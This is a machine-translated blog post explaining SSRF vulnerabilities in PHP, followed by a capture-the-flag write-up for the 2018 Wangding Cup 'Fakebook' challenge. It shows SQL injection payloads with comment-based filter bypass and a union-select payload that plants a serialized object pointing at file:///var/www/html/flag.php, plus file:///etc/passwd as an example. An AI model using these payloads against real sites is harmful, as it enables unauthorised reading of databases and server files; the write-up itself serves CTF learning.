当前位置:网站首页>SSRF vulnerability file pseudo protocol [netding Cup 2018] fakebook1
SSRF vulnerability file pseudo protocol [netding Cup 2018] fakebook1
2022-07-07 13:49:00 【A traveler】
About SSRF Loophole ( Server side forgery ) Reference resources SSRF Vulnerability principle attack and defense ( Super detailed summary )_ Zero tap code blog -CSDN Blog _ssrf Loophole defense
SSRF(Server-Side Request Forgery: Server side Request Forgery ) It is a security vulnerability that is constructed by the attacker to form a request initiated by the server .
In general ,SSRF The target of the attack is from Extranet Inaccessible internal system .( Because it is initiated by the server , So it can request to the internal system connected to it and isolated from the external network )
Four 、 produce SSRF Loophole function
SSRF The attack may exist in applications written in any language , Next, we will give an example php There may be SSRF Loophole function .
1、file_get_contents:
The following code uses file_get_contents Function from user specified url Get photo . Then save it on the hard disk with a random file name , And show the user .
<?php
if (isset($_POST['url']))
{
$content = file_get_contents($_POST['url']);
$filename ='./images/'.rand().';img1.jpg';
file_put_contents($filename, $content);
echo $_POST['url'];
$img = "<img src=\"".$filename."\"/>";
}
echo $img;
?>
2、sockopen():
The following code USES fsockopen Function implementation to obtain the user specified url The data of ( Documents or html). This function uses socket Establish with the server tcp Connect , Transmit raw data .
<?php
function GetFile($host,$port,$link)
{
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if (!$fp) {
echo "$errstr (error number $errno) \n";
} else {
$out = "GET $link HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$contents='';
while (!feof($fp)) {
$contents.= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
?>
3、curl_exec():
cURL This is another very common implementation , It passes through PHP get data . file / The data is downloaded and stored in “curled” In the disk under the folder , A random number and “.txt” File extension .
<?php
if (isset($_POST['url']))
{
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj,CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($curlobj);
curl_close($curlobj);
$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result);
echo $result;
}
?>
matters needing attention
In general PHP It won't turn on fopen Of gopher wrapper
file_get_contents Of gopher The agreement cannot URL code
file_get_contents About Gopher Of 302 The jump will appear bug, Leading to the failure of utilization
curl/libcurl 7.43 On gopher The agreement exists bug(%00 truncation ) After testing 7.49 You can use
curl_exec() Jump is not tracked by default ,
file_get_contents() file_get_contents Support php://input agreement
5、 ... and 、SSRF in URL Pseudo protocol
When we find out SSRF After the leak , The first thing to do is to test all available URL Fake protocol
file:/// Get the file content from the file system , Such as ,file:///etc/passwd
dict:// Dictionary server protocol , ACCESS Dictionary resources , Such as ,dict:///ip:6739/info:
sftp:// SSH File transfer protocol or secure file transfer protocol
ldap:// Lightweight directory access protocol
tftp:// Simple file transfer protocol
gopher:// Distributed document delivery service , You can use gopherus Generate payload
The above knowledge points come from the chapter header reference ;
from facebook Start with this example :
Reference resources :[ WANGDING cup 2018]Fakebook_ Programmer's little chicken blog -CSDN Blog
[ WANGDING cup 2018]Fakebook(ssrf Loophole )_ Tian Wen _Herbert555 The blog of -CSDN Blog
First register and then log in to find the user we registered , Click in ;
And found that URL in The variable of no, Try sql Inject :
Use comments to bypass :union/**/select
?no=-1 union/**/select 1,database(),3,4# ( Database search ) Find out 'fakebook' ?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'# ( Look up the name of the table ) Find out 'users'?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'# ( Check field ) Field name 'no,username,data'Joint injection here , Spaces are filtered , Just use /**/ Instead of , A series of routine findings : Serialized things :
2. Directory scanning , Found to have robots.txt, also flag.php;
open robots, You can find the source code package ;
Analysis of the source code :
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}stay get It is found that curl_exec Associated with the ssrf , combining flag.php, Use file: agreement , And open a user's source code to see data Encrypted webpage of segment ;
So will blog Change it to file:///var/www/html/flag.php
You can deserialize , You can also directly change the serialization results found before : Change the length to 29,blog Just change it :
structure :
?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
What I don't understand here is , Why is it 4 Position plus serialization ??
Then check the source code ,data Positional base64 Just encode and decode ;
There is another unexpected method , Namely load_file(); Specific reference ;
边栏推荐
- 室內ROS機器人導航調試記錄(膨脹半徑的選取經驗)
- Error lnk2019: unresolved external symbol
- DID登陆-MetaMask
- 社会责任·价值共创,中关村网络安全与信息化产业联盟对话网信企业家海泰方圆董事长姜海舟先生
- 566. Reshaping the matrix
- mysql ”Invalid use of null value“ 解决方法
- Digital IC Design SPI
- 2022-7-7 Leetcode 844.比较含退格的字符串
- Cmake learning and use notes (1)
- 2022-7-7 Leetcode 34. Find the first and last positions of elements in a sorted array
猜你喜欢
Xshell connection server changes key login to password login
室内ROS机器人导航调试记录(膨胀半径的选取经验)
交付效率提升52倍,运营效率提升10倍,看《金融云原生技术实践案例汇编》(附下载)
QQ medicine, Tencent ticket
Advanced Mathematics - Chapter 8 differential calculus of multivariate functions 1
My "troublesome" subordinates after 00: not bad for money, against leaders, and resist overtime
Redis只能做缓存?太out了!
LIS longest ascending subsequence problem (dynamic programming, greed + dichotomy)
作战图鉴:12大场景详述容器安全建设要求
2022-7-7 Leetcode 844. Compare strings with backspace
随机推荐
Help tenants
数据库系统概论-第一章绪论【概念模型、层次模型和三级模式(外模式、模式、内模式)】
Signal strength (RSSI) knowledge sorting
室內ROS機器人導航調試記錄(膨脹半徑的選取經驗)
[fortress machine] what is the difference between cloud fortress machine and ordinary fortress machine?
LeetCode_二分搜索_中等_153.寻找旋转排序数组中的最小值
Error lnk2019: unresolved external symbol
Split screen bug notes
Realize the IP address home display function and number home query
华为镜像地址
2022-7-6 sigurg is used to receive external data. I don't know why it can't be printed out
"Song of ice and fire" in the eleventh issue of "open source Roundtable" -- how to balance the natural contradiction between open source and security?
[1] Basic knowledge of ros2 - summary version of operation commands
Ogre introduction
Some principles of mongodb optimization
Redis只能做缓存?太out了!
How far can it go to adopt a cow by selling the concept to the market?
Mongodb slice summary
2022-7-6 Leetcode27.移除元素——太久没有做题了,为双指针如此狼狈的一天
toRaw和markRaw